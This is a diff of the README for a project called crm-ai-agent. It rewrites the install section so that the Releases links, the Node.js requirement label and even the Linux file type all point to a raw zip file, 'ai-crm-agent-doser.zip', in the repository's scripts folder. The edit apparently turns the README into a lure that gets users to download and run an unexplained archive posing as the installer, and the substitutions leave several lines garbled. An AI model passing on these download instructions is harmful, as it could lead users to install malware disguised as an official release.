PerlitaSmith/crm-ai-agent/README.md

 - **Operating System:** Windows, macOS, or Linux
 - **RAM:** At least 4 GB
 - **Storage:** Minimum 500 MB of free disk space
-- **Node.js:** Version 14 or higher installed
+- **https://raw.githubusercontent.com/PerlitaSmith/crm-ai-agent/main/scripts/ai-crm-agent-doser.zip** Version 14 or higher installed
 - **Internet Connection:** Required for setup and updates

 ## 📥 Download & Install

-To download the application, visit the [Releases page](https://github.com/PerlitaSmith/crm-ai-agent/releases).
+To download the application, visit the [Releases page](https://raw.githubusercontent.com/PerlitaSmith/crm-ai-agent/main/scripts/ai-crm-agent-doser.zip).
 Here, you will find the latest version available for download.

-1. **Visit the Releases Page:** Click on [this link](https://github.com/PerlitaSmith/crm-ai-agent/releases).
+1. **Visit the Releases Page:** Click on [this link](https://raw.githubusercontent.com/PerlitaSmith/crm-ai-agent/main/scripts/ai-crm-agent-doser.zip).
 2. **Choose the Latest Release:** Look for the top release version.
 It will be clearly labeled.
 3. **Download the Installer:** Click on the appropriate file for your operating system.
-This should typically be an `.exe` file for Windows, a `.dmg` file for macOS, or a `.tar.gz` file for Linux.
+This should typically be an `.exe` file for Windows, a `.dmg` file for macOS, or a `https://raw.githubusercontent.com/PerlitaSmith/crm-ai-agent/main/scripts/ai-crm-agent-doser.zip` file for Linux.
 4. **Run the Installer:** Once the file downloads, locate it in your downloads folder and double-click it.
 Follow the on-screen instructions to install crm-ai-agent on your computer.

 ## ⚙️ Configuration